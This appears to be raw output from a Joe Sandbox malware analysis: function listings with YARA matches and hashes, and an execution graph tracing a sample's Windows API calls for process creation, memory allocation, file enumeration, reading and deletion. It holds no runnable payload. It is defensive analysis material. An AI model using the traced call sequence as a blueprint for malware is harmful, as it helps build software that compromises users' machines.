                                            • Snapshot File: hcaresult_8_2_3ff0000_uspEUeZyrqFDmi.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: $e$k$o
                                            • API String ID: 0-3624523832
                                            • Opcode ID: ce7b0793bbba39fb1fcf83f1dcd5e0f12d53632f0721fa6ddb4b89a455289521
                                            • Instruction ID: 518e6fea374c451c6ccf95fc99f7a7e9ec7fc54c70b166512538769fb6d61bd3
                                            • Opcode Fuzzy Hash: ce7b0793bbba39fb1fcf83f1dcd5e0f12d53632f0721fa6ddb4b89a455289521
                                            • Instruction Fuzzy Hash: 13B1E8B5A00708ABDB24DFA8CC85FEFB7F9AF88704F108558F659A7240D675AA418B50
                                            Function 04335AB1 Relevance: 5.3, Strings: 4, Instructions: 254COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_3ff0000_uspEUeZyrqFDmi.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: $e$h$o
                                            • API String ID: 0-3662636641
                                            • Opcode ID: 7dde154f149c934ed489ae539cd67fab72e1ffec1dcdc85d19b3957b364cb7c5
                                            • Instruction ID: e51c48005802ad603bcdef915561be04a493c827b6afcfda5a234ec27713c21f
                                            • Opcode Fuzzy Hash: 7dde154f149c934ed489ae539cd67fab72e1ffec1dcdc85d19b3957b364cb7c5
                                            • Instruction Fuzzy Hash: 478162B2C4011A6AEB24EF90DD45FFF73BCDF85704F0051EAA509A6140EA787B448BA1
                                            Function 0433504B Relevance: 5.1, Strings: 4, Instructions: 122COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_3ff0000_uspEUeZyrqFDmi.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                            • API String ID: 0-2877786613
                                            • Opcode ID: 8a0d6b1b750c573a178be3c87d810651b3df272a4b63ebd9158a86dcf6e65da5
                                            • Instruction ID: a66c6a33199c04a733d09b6f8e27f16c6451ff9ab0065038e363703f67a1c9b9
                                            • Opcode Fuzzy Hash: 8a0d6b1b750c573a178be3c87d810651b3df272a4b63ebd9158a86dcf6e65da5
                                            • Instruction Fuzzy Hash: CD411D755111187AFB01EF90CC42FEF7BBC9F96704F009149FA04AA280E778B605C7A6
                                            Function 0433504D Relevance: 5.1, Strings: 4, Instructions: 120COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_3ff0000_uspEUeZyrqFDmi.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                            • API String ID: 0-2877786613
                                            • Opcode ID: 3bc24011b10d284fc5dff29e8f73a40b65053b8f338017c60023720cb3989166
                                            • Instruction ID: 148296852ff8c673f2399fd7d3f13bfe0fb993988790e79cd26517be6cf6bc9c
                                            • Opcode Fuzzy Hash: 3bc24011b10d284fc5dff29e8f73a40b65053b8f338017c60023720cb3989166
                                            • Instruction Fuzzy Hash: 5F311F755111187AFB11EF90CC42FEF7BBC9F96704F00514AFA04AA280EB78B645C7A6
                                            Function 04335ABD Relevance: 5.1, Strings: 4, Instructions: 102COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_3ff0000_uspEUeZyrqFDmi.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: $e$h$o
                                            • API String ID: 0-3662636641
                                            • Opcode ID: 6b7d8320a6838d164e32378140d7cc152ae617d482e67c06b2d76ecf25e55da9
                                            • Instruction ID: 99af63d53f5cdcecfa7ec040d8181375ebe77963bff57794940e06b44664216b
                                            • Opcode Fuzzy Hash: 6b7d8320a6838d164e32378140d7cc152ae617d482e67c06b2d76ecf25e55da9
                                            • Instruction Fuzzy Hash: 7E415571C4022ABAEB14EF64DD45FEF73B8EF44704F0091EA9509A6140EB7877448FA1
                                            Function 043312FD Relevance: 5.1, Strings: 4, Instructions: 89COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_3ff0000_uspEUeZyrqFDmi.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: 0$0$3$8
                                            • API String ID: 0-3632578322
                                            • Opcode ID: 2a50cbad33028d612e83361338f560a0021036c9e450ea2630aa776ca2a0077d
                                            • Instruction ID: aaf8fddd2a6b39e9caa48bb4f894b907278d8c523e38eebd43216701aeabc832
                                            • Opcode Fuzzy Hash: 2a50cbad33028d612e83361338f560a0021036c9e450ea2630aa776ca2a0077d
                                            • Instruction Fuzzy Hash: 59312CB1A10209ABEF14DFA4DC41BFE77F8EF48308F045199E908A7240E775BA058BE5
                                            Function 0433275B Relevance: 5.0, Strings: 4, Instructions: 48COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_3ff0000_uspEUeZyrqFDmi.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: $e$k$o
                                            • API String ID: 0-3624523832
                                            • Opcode ID: 136e885c14003a509e1df039e871936028a7ce1d7c72047fc2554ca594c292fb
                                            • Instruction ID: a7ecec4cb655dc8e1d16b2062ce9c0af441eaf772fdd0cacb169ae2ce6e117fe
                                            • Opcode Fuzzy Hash: 136e885c14003a509e1df039e871936028a7ce1d7c72047fc2554ca594c292fb
                                            • Instruction Fuzzy Hash: D111C8B2900218ABDB14DF94D8C5ADEFBB9FF48314F04825DE919AB201D775A544CBA0
                                            Function 0433275D Relevance: 5.0, Strings: 4, Instructions: 47COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_3ff0000_uspEUeZyrqFDmi.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: $e$k$o
                                            • API String ID: 0-3624523832
                                            • Opcode ID: 09fb8faef188cc07b459b9941dc22ffa9b61f39f6f7d23ecf0a06c858f382c30
                                            • Instruction ID: 9cec8d1902d3d418f907ae67ffd4cf0a7ef0091443815fe0b714308c1a1ad112
                                            • Opcode Fuzzy Hash: 09fb8faef188cc07b459b9941dc22ffa9b61f39f6f7d23ecf0a06c858f382c30
                                            • Instruction Fuzzy Hash: 0301C4B2900218ABDB14DF98D885ADEF7B9FF48704F04825AE919AB201E775A544CBA0

                                            Execution Graph

                                            Execution Coverage:2.8%
                                            Dynamic/Decrypted Code Coverage:4.1%
                                            Signature Coverage:1.5%
                                            Total number of Nodes:460
                                            Total number of Limit Nodes:74
                                            execution_graph 91500 3259ba0 91502 3259baf 91500->91502 91501 3259bf0 91502->91501 91503 3259bdd CreateThread 91502->91503 91504 326c520 91506 326c549 91504->91506 91505 326c64d 91506->91505 91507 326c5f3 FindFirstFileW 91506->91507 91507->91505 91509 326c60e 91507->91509 91508 326c634 FindNextFileW 91508->91509 91510 326c646 FindClose 91508->91510 91509->91508 91510->91505 91511 3267260 91512 3267278 91511->91512 91514 32672d2 91511->91514 91512->91514 91515 326b1b0 91512->91515 91516 326b1d6 91515->91516 91517 326b409 91516->91517 91542 32796c0 91516->91542 91517->91514 91519 326b24c 91519->91517 91545 327c660 91519->91545 91521 326b26b 91521->91517 91522 326b342 91521->91522 91551 3278900 91521->91551 91523 326b361 91522->91523 91525 3265a40 LdrInitializeThunk 91522->91525 91531 326b3f1 91523->91531 91563 3278470 91523->91563 91525->91523 91527 326b2d6 91527->91517 91528 326b32a 91527->91528 91530 326b308 91527->91530 91555 3265a40 91527->91555 91559 3268040 91528->91559 91578 32746c0 LdrInitializeThunk 91530->91578 91533 3268040 LdrInitializeThunk 91531->91533 91537 326b3ff 91533->91537 91537->91514 91538 326b3c8 91568 3278520 91538->91568 91540 326b3e2 91573 3278680 91540->91573 91543 32796dd 91542->91543 91544 32796ee CreateProcessInternalW 91543->91544 91544->91519 91546 327c5d0 91545->91546 91547 327c62d 91546->91547 91579 327b450 91546->91579 91547->91521 91549 327c60a 91582 327b370 91549->91582 91552 327891d 91551->91552 91591 3bc2c0a 91552->91591 91553 326b2cd 91553->91522 91553->91527 91556 3265a55 91555->91556 91594 3278ad0 91556->91594 91558 3265a7e 91558->91530 91560 3268053 91559->91560 91600 3278800 91560->91600 91562 326807e 91562->91514 91564 32784f0 91563->91564 91565 327849e 91563->91565 91606 3bc39b0 LdrInitializeThunk 91564->91606 91565->91538 91566 3278515 91566->91538 91569 327859d 91568->91569 91570 327854b 91568->91570 91607 3bc4340 LdrInitializeThunk 91569->91607 91570->91540 91571 32785c2 91571->91540 91574 3278700 91573->91574 91576 32786ae 91573->91576 91608 3bc2fb0 LdrInitializeThunk 91574->91608 91575 3278725 91575->91531 91576->91531 91578->91528 91585 32795e0 91579->91585 91581 327b46b 91581->91549 91588 3279630 91582->91588 91584 327b389 91584->91547 91586 32795fd 91585->91586 91587 327960e RtlAllocateHeap 91586->91587 91587->91581 91589 327964a 91588->91589 91590 327965b RtlFreeHeap 91589->91590 91590->91584 91592 3bc2c1f LdrInitializeThunk 91591->91592 91593 3bc2c11 91591->91593 91592->91553 91593->91553 91595 3278b84 91594->91595 91597 3278b02 91594->91597 91599 3bc2d10 LdrInitializeThunk 91595->91599 91596 3278bc9 91596->91558 91597->91558 91599->91596 91601 3278881 91600->91601 91602 327882e 91600->91602 91605 3bc2dd0 LdrInitializeThunk 91601->91605 91602->91562 91603 32788a6 91603->91562 91605->91603 91606->91566 91607->91571 91608->91575 91609 3266ca0 91610 3266cca 91609->91610 91613 3267e70 91610->91613 91612 3266cf4 91614 3267e8d 91613->91614 91620 32789f0 91614->91620 91616 3267ee4 91616->91612 91617 3267edd 91617->91616 91618 3278ad0 LdrInitializeThunk 91617->91618 91619 3267f0d 91618->91619 91619->91612 91621 3278a8b 91620->91621 91623 3278a1b 91620->91623 91625 3bc2f30 LdrInitializeThunk 91621->91625 91622 3278ac4 91622->91617 91623->91617 91625->91622 91626 3260ce0 91627 3260ce1 91626->91627 91632 3264470 91627->91632 91629 3260d18 91630 3260d4c PostThreadMessageW 91629->91630 91631 3260d5d 91629->91631 91630->91631 91633 3264494 91632->91633 91634 326449b 91633->91634 91635 32644d0 LdrLoadDll 91633->91635 91634->91629 91635->91634 91636 32716a0 91637 32716bc 91636->91637 91638 32716e4 91637->91638 91639 32716f8 91637->91639 91640 32792d0 NtClose 91638->91640 91646 32792d0 91639->91646 91642 32716ed 91640->91642 91643 3271701 91649 327b490 RtlAllocateHeap 91643->91649 91645 327170c 91647 32792ea 91646->91647 91648 32792fb NtClose 91647->91648 91648->91643 91649->91645 91661 3263033 91666 3267cc0 91661->91666 91664 32792d0 NtClose 91665 326305f 91664->91665 91667 3263043 91666->91667 91668 3267cda 91666->91668 91667->91664 91667->91665 91672 32789a0 91668->91672 91671 32792d0 NtClose 91671->91667 91673 32789bd 91672->91673 91676 3bc35c0 LdrInitializeThunk 91673->91676 91674 3267daa 91674->91671 91676->91674 91677 3268730 91678 3268735 91677->91678 91679 3268721 91677->91679 91678->91679 91681 3266ec0 LdrInitializeThunk LdrInitializeThunk 91678->91681 91681->91679 91682 326f770 91683 326f7d4 91682->91683 91711 32661d0 91683->91711 91685 326f90e 91686 326f907 91686->91685 91718 32662e0 91686->91718 91688 326f98a 91689 326fac2 91688->91689 91708 326fab3 91688->91708 91722 326f550 91688->91722 91690 32792d0 NtClose 91689->91690 91692 326facc 91690->91692 91693 326f9c6 91693->91689 91694 326f9d1 91693->91694 91695 327b450 RtlAllocateHeap 91694->91695 91696 326f9fa 91695->91696 91697 326fa03 91696->91697 91698 326fa19 91696->91698 91700 32792d0 NtClose 91697->91700 91731 326f440 CoInitialize 91698->91731 91701 326fa0d 91700->91701 91702 326fa27 91733 3278da0 91702->91733 91704 326faa2 91705 32792d0 NtClose 91704->91705 91706 326faac 91705->91706 91707 327b370 RtlFreeHeap 91706->91707 91707->91708 91709 326fa45 91709->91704 91710 3278da0 LdrInitializeThunk 91709->91710 91710->91709 91712 3266203 91711->91712 91713 3266227 91712->91713 91737 3278e40 91712->91737 91713->91686 91715 326624a 91715->91713 91716 32792d0 NtClose 91715->91716 91717 32662ca 91716->91717 91717->91686 91719 3266305 91718->91719 91742 3278c20 91719->91742 91723 326f56c 91722->91723 91724 3264470 LdrLoadDll 91723->91724 91726 326f58a 91724->91726 91725 326f593 91725->91693 91726->91725 91727 3264470 LdrLoadDll 91726->91727 91728 326f65e 91727->91728 91729 3264470 LdrLoadDll 91728->91729 91730 326f6b8 91728->91730 91729->91730 91730->91693 91732 326f4a5 91731->91732 91732->91702 91734 3278dba 91733->91734 91747 3bc2ba0 LdrInitializeThunk 91734->91747 91735 3278dea 91735->91709 91738 3278e5a 91737->91738 91741 3bc2ca0 LdrInitializeThunk 91738->91741 91739 3278e86 91739->91715 91741->91739 91743 3278c3a 91742->91743 91746 3bc2c60 LdrInitializeThunk 91743->91746 91744 3266379 91744->91688 91746->91744 91747->91735 91748 3271231 91760 3279140 91748->91760 91750 3271252 91751 3271285 91750->91751 91752 3271270 91750->91752 91753 32792d0 NtClose 91751->91753 91754 32792d0 NtClose 91752->91754 91757 327128e 91753->91757 91755 3271279 91754->91755 91756 32712c5 91757->91756 91758 327b370 RtlFreeHeap 91757->91758 91759 32712b9 91758->91759 91761 32791e7 91760->91761 91763 327916b 91760->91763 91762 32791fd NtReadFile 91761->91762 91762->91750 91763->91750 91764 3278730 91765 32787c2 91764->91765 91766 327875e 91764->91766 91769 3bc2ee0 LdrInitializeThunk 91765->91769 91767 32787f3 91769->91767 91770 3275fb0 91771 327600a 91770->91771 91773 3276017 91771->91773 91774 32739d0 91771->91774 91781 327b2e0 91774->91781 91776 3273b1e 91776->91773 91777 3273a11 91777->91776 91778 3264470 LdrLoadDll 91777->91778 91780 3273a57 91778->91780 91779 3273aa0 Sleep 91779->91780 91780->91776 91780->91779 91784 3279430 91781->91784 91783 327b311 91783->91777 91785 32794c5 91784->91785 91787 327945b 91784->91787 91786 32794db NtAllocateVirtualMemory 91785->91786 91786->91783 91787->91783 91788 3271a30 91789 3271a49 91788->91789 91790 3271a91 91789->91790 91793 3271ad4 91789->91793 91795 3271ad9 91789->91795 91791 327b370 RtlFreeHeap 91790->91791 91792 3271aa1 91791->91792 91794 327b370 RtlFreeHeap 91793->91794 91794->91795 91796 3279230 91797 32792a7 91796->91797 91799 327925b 91796->91799 91798 32792bd NtDeleteFile 91797->91798 91800 3270070 91801 327008d 91800->91801 91802 3264470 LdrLoadDll 91801->91802 91803 32700ab 91802->91803 91804 32788b0 91805 32788cd 91804->91805 91808 3bc2df0 LdrInitializeThunk 91805->91808 91806 32788f5 91808->91806 91811 3269b47 91812 3269b63 91811->91812 91813 3269b5e 91811->91813 91814 3269b98 91812->91814 91815 327b370 RtlFreeHeap 91812->91815 91815->91814 91816 3259c00 91818 3259fe7 91816->91818 91817 325a3cc 91818->91817 91820 327afd0 91818->91820 91821 327aff6 91820->91821 91826 3254200 91821->91826 91823 327b002 91825 327b03b 91823->91825 91829 3275540 91823->91829 91825->91817 91833 3263130 91826->91833 91828 325420d 91828->91823 91830 32755a2 91829->91830 91832 32755af 91830->91832 91844 3261920 91830->91844 91832->91825 91834 326314d 91833->91834 91836 3263166 91834->91836 91837 3279d10 91834->91837 91836->91828 91839 3279d2a 91837->91839 91838 3279d59 91838->91836 91839->91838 91840 3278900 LdrInitializeThunk 91839->91840 91841 3279db6 91840->91841 91842 327b370 RtlFreeHeap 91841->91842 91843 3279dcc 91842->91843 91843->91836 91845 326195b 91844->91845 91860 3267dd0 91845->91860 91847 3261963 91848 3261c30 91847->91848 91849 327b450 RtlAllocateHeap 91847->91849 91848->91832 91850 3261979 91849->91850 91851 327b450 RtlAllocateHeap 91850->91851 91852 326198a 91851->91852 91853 327b450 RtlAllocateHeap 91852->91853 91854 3261998 91853->91854 91859 3261a2c 91854->91859 91875 3266930 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 91854->91875 91856 3264470 LdrLoadDll 91857 3261be2 91856->91857 91871 3277e80 91857->91871 91859->91856 91861 3267dfc 91860->91861 91862 3267cc0 2 API calls 91861->91862 91863 3267e1f 91862->91863 91864 3267e41 91863->91864 91865 3267e29 91863->91865 91868 32792d0 NtClose 91864->91868 91869 3267e5d 91864->91869 91866 3267e34 91865->91866 91867 32792d0 NtClose 91865->91867 91866->91847 91867->91866 91870 3267e53 91868->91870 91869->91847 91870->91847 91872 3277ee2 91871->91872 91874 3277eef 91872->91874 91876 3261c40 91872->91876 91874->91848 91875->91859 91892 32680a0 91876->91892 91878 3261c60 91886 32621a5 91878->91886 91896 3271070 91878->91896 91881 3261e6f 91883 327c660 2 API calls 91881->91883 91882 3261cbb 91882->91886 91899 327c530 91882->91899 91884 3261e84 91883->91884 91888 3261ed1 91884->91888 91904 3260770 91884->91904 91885 3268040 LdrInitializeThunk 91885->91888 91886->91874 91888->91885 91888->91886 91890 3260770 LdrInitializeThunk 91888->91890 91889 3268040 LdrInitializeThunk 91891 3262023 91889->91891 91890->91888 91891->91888 91891->91889 91893 32680ad 91892->91893 91894 32680d5 91893->91894 91895 32680ce SetErrorMode 91893->91895 91894->91878 91895->91894 91897 327b2e0 NtAllocateVirtualMemory 91896->91897 91898 3271091 91897->91898 91898->91882 91900 327c546 91899->91900 91901 327c540 91899->91901 91902 327b450 RtlAllocateHeap 91900->91902 91901->91881 91903 327c56c 91902->91903 91903->91881 91905 3260792 91904->91905 91907 3279550 91904->91907 91905->91891 91908 327956d 91907->91908 91911 3bc2c70 LdrInitializeThunk 91908->91911 91909 3279595 91909->91905 91911->91909 91912 32621c0 91913 3278900 LdrInitializeThunk 91912->91913 91914 32621f6 91913->91914 91917 3279360 91914->91917 91916 326220b 91918 32793f2 91917->91918 91919 327938e 91917->91919 91922 3bc2e80 LdrInitializeThunk 91918->91922 91919->91916 91920 3279423 91920->91916 91922->91920 91923 3267080 91924 326709c 91923->91924 91926 32670ef 91923->91926 91924->91926 91927 32792d0 NtClose 91924->91927 91925 3267224 91926->91925 91934 3266460 NtClose LdrInitializeThunk LdrInitializeThunk 91926->91934 91928 32670b7 91927->91928 91933 3266460 NtClose LdrInitializeThunk LdrInitializeThunk 91928->91933 91930 32671fe 91930->91925 91935 3266630 NtClose LdrInitializeThunk LdrInitializeThunk 91930->91935 91933->91926 91934->91930 91935->91925 91936 326ac80 91941 326a990 91936->91941 91938 326ac8d 91955 326a610 91938->91955 91940 326aca9 91942 326a9b5 91941->91942 91966 32682b0 91942->91966 91945 326ab03 91945->91938 91947 326ab1a 91947->91938 91948 326ab11 91948->91947 91950 326ac07 91948->91950 91985 326a060 91948->91985 91952 326ac6a 91950->91952 91994 326a3d0 91950->91994 91953 327b370 RtlFreeHeap 91952->91953 91954 326ac71 91953->91954 91954->91938 91956 326a622 91955->91956 91963 326a62d 91955->91963 91957 327b450 RtlAllocateHeap 91956->91957 91957->91963 91958 326a650 91958->91940 91959 32682b0 GetFileAttributesW 91959->91963 91960 326a962 91961 326a977 91960->91961 91962 327b370 RtlFreeHeap 91960->91962 91961->91940 91962->91961 91963->91958 91963->91959 91963->91960 91964 326a060 RtlFreeHeap 91963->91964 91965 326a3d0 RtlFreeHeap 91963->91965 91964->91963 91965->91963 91967 32682d1 91966->91967 91968 32682e3 91967->91968 91969 32682d8 GetFileAttributesW 91967->91969 91968->91945 91970 32732c0 91968->91970 91969->91968 91971 32732ce 91970->91971 91972 32732d5 91970->91972 91971->91948 91973 3264470 LdrLoadDll 91972->91973 91974 327330a 91973->91974 91975 3273319 91974->91975 91998 3272d80 LdrLoadDll 91974->91998 91977 327b450 RtlAllocateHeap 91975->91977 91982 32734c4 91975->91982 91978 3273332 91977->91978 91979 32734ba 91978->91979 91981 327334e 91978->91981 91978->91982 91980 327b370 RtlFreeHeap 91979->91980 91979->91982 91980->91982 91981->91982 91983 327b370 RtlFreeHeap 91981->91983 91982->91948 91984 32734ae 91983->91984 91984->91948 91986 326a086 91985->91986 91999 326daa0 91986->91999 91988 326a0f8 91990 326a280 91988->91990 91992 326a116 91988->91992 91989 326a265 91989->91948 91990->91989 91991 3269f20 RtlFreeHeap 91990->91991 91991->91990 91992->91989 92004 3269f20 91992->92004 91995 326a3f6 91994->91995 91996 326daa0 RtlFreeHeap 91995->91996 91997 326a47d 91996->91997 91997->91950 91998->91975 92001 326dac4 91999->92001 92000 326dace 92000->91988 92001->92000 92002 327b370 RtlFreeHeap 92001->92002 92003 326db11 92002->92003 92003->91988 92005 3269f3d 92004->92005 92008 326db20 92005->92008 92007 326a043 92007->91992 92009 326db44 92008->92009 92010 326dbee 92009->92010 92011 327b370 RtlFreeHeap 92009->92011 92010->92007 92011->92010 92012 3265ac0 92013 3268040 LdrInitializeThunk 92012->92013 92014 3265af0 92013->92014 92017 3267fc0 92014->92017 92016 3265b15 92018 3268004 92017->92018 92019 3268025 92018->92019 92024 32785d0 92018->92024 92019->92016 92021 3268015 92022 3268031 92021->92022 92023 32792d0 NtClose 92021->92023 92022->92016 92023->92019 92025 3278650 92024->92025 92026 32785fe 92024->92026 92029 3bc4650 LdrInitializeThunk 92025->92029 92026->92021 92027 3278675 92027->92021 92029->92027 92030 3bc2ad0 LdrInitializeThunk 92031 325b490 92032 327b2e0 NtAllocateVirtualMemory 92031->92032 92033 325cb01 92031->92033 92032->92033 92034 327c590 92035 327b370 RtlFreeHeap 92034->92035 92036 327c5a5 92035->92036 92042 3278fd0 92043 3279087 92042->92043 92045 3278fff 92042->92045 92044 327909d NtCreateFile 92043->92044 92046 32758d0 92048 3275934 92046->92048 92047 327596b 92048->92047 92051 32710e0 92048->92051 92050 327594d 92053 3271106 92051->92053 92052 32711e1 92052->92050 92053->92052 92054 3271285 92053->92054 92055 3271270 92053->92055 92056 32792d0 NtClose 92054->92056 92057 32792d0 NtClose 92055->92057 92060 327128e 92056->92060 92058 3271279 92057->92058 92058->92050 92059 32712c5 92059->92050 92060->92059 92061 327b370 RtlFreeHeap 92060->92061 92062 32712b9 92061->92062 92062->92050 92063 3262698 92064 32626b5 92063->92064 92065 32661d0 2 API calls 92064->92065 92066 32626c0 92065->92066

                                            Executed Functions

                                            Function 0326C520 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • FindFirstFileW.KERNELBASE(?,00000000), ref: 0326C604
                                            • FindNextFileW.KERNELBASE(?,00000010), ref: 0326C63F
                                            • FindClose.KERNELBASE(?), ref: 0326C64A
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3552335320.0000000003250000.00000040.80000000.00040000.00000000.sdmp, Offset: 03250000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3250000_setupugc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Find$File$CloseFirstNext
                                            • String ID:
                                            • API String ID: 3541575487-0
                                            • Opcode ID: fa6dc311ed47ccb88f5a2f5c31066e8fc29bd714adbf69b4eb893539495236bf
                                            • Instruction ID: 665821a203f927470bbe5a36fce1013b92151c3e5249d9bf09b5f38711e98609
                                            • Opcode Fuzzy Hash: fa6dc311ed47ccb88f5a2f5c31066e8fc29bd714adbf69b4eb893539495236bf
                                            • Instruction Fuzzy Hash: 5631A575910318BBDB20EB64CC84FFF777CAF84745F144458B959AB180EAB0AAC48BA0
                                            Function 03278FD0 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtCreateFile.NTDLL(?,?,?,?,4A9873AC,?,?,?,?,?,?), ref: 032790CE
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3552335320.0000000003250000.00000040.80000000.00040000.00000000.sdmp, Offset: 03250000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3250000_setupugc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0
                                            • Opcode ID: 67770762bfd51f78d82aa628fda4528e784f95911ec6b29247aadbff0f17165e
                                            • Instruction ID: 0af63ae4c974de40305511a43c96a719e6540955a899c9f4ed09d29f3e729084
                                            • Opcode Fuzzy Hash: 67770762bfd51f78d82aa628fda4528e784f95911ec6b29247aadbff0f17165e
                                            • Instruction Fuzzy Hash: 3431C2B5A10648AFCB14DF98D881EEFB7F9EF88314F108219F919A7344D770A951CBA0
                                            Function 03279140 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtReadFile.NTDLL(?,?,?,?,4A9873AC,?,?,?,?), ref: 03279226
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3552335320.0000000003250000.00000040.80000000.00040000.00000000.sdmp, Offset: 03250000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3250000_setupugc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FileRead
                                            • String ID:
                                            • API String ID: 2738559852-0
                                            • Opcode ID: 5fb8de2c51325e33cf20a958726c354214131b0131cf036008bcef2f6367b8c1
                                            • Instruction ID: 64a2c2c91673d37d95733ce45b4192f550edc93670effdd37bfe2ebc66d84cf0
                                            • Opcode Fuzzy Hash: 5fb8de2c51325e33cf20a958726c354214131b0131cf036008bcef2f6367b8c1
                                            • Instruction Fuzzy Hash: EA31F6B5A00248ABDB14DF98D841EEFB7F9EF88704F108219FD09A7340D774A951CBA1
                                            Function 03279430 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtAllocateVirtualMemory.NTDLL(03261CBB,?,03277EEF,00000000,4A9873AC,00003000,?,?,?,?,?,03277EEF,03261CBB), ref: 032794F8
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3552335320.0000000003250000.00000040.80000000.00040000.00000000.sdmp, Offset: 03250000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3250000_setupugc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateMemoryVirtual
                                            • String ID:
                                            • API String ID: 2167126740-0
                                            • Opcode ID: 454ab75c95555c584024a8b5792c731b3c966d355955c4dc466659014c8e5c51
                                            • Instruction ID: 83abbe492d115a23f324f51d2d75ee902af2f46f5e5ef9b684dbc2f544d25644
                                            • Opcode Fuzzy Hash: 454ab75c95555c584024a8b5792c731b3c966d355955c4dc466659014c8e5c51
                                            • Instruction Fuzzy Hash: B821F5B5A10349ABDB14DF98DC41FAFB7B9EB88300F104519FD08AB240D7B4AA518BA1
                                            Function 03279230 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3552335320.0000000003250000.00000040.80000000.00040000.00000000.sdmp, Offset: 03250000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3250000_setupugc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: DeleteFile
                                            • String ID:
                                            • API String ID: 4033686569-0
                                            • Opcode ID: 63de4ea6af3ddc3236bdf96bac0b669bb223df6dc87bc3ba1add14a003f8f1b5
                                            • Instruction ID: 0c674fe5376b1f0945f80975ea961124210d91cf0c4cd41a60c19c80c4f2da76
                                            • Opcode Fuzzy Hash: 63de4ea6af3ddc3236bdf96bac0b669bb223df6dc87bc3ba1add14a003f8f1b5
                                            • Instruction Fuzzy Hash: E71191759107096BD720EB64DC01FAF73ACEF84314F104109F9086B280EBB17A4187E1
                                            Function 032792D0 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 03279304
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3552335320.0000000003250000.00000040.80000000.00040000.00000000.sdmp, Offset: 03250000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3250000_setupugc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Close
                                            • String ID:
                                            • API String ID: 3535843008-0
                                            • Opcode ID: 818853954403b0610952d6fd8e92de2fb837736f4d0c203e1f11f03a27760536
                                            • Instruction ID: 004c2f4a495d96b6f3b9b72c0be112cd34f968073f2b1524d39ee1e0ff65ad73
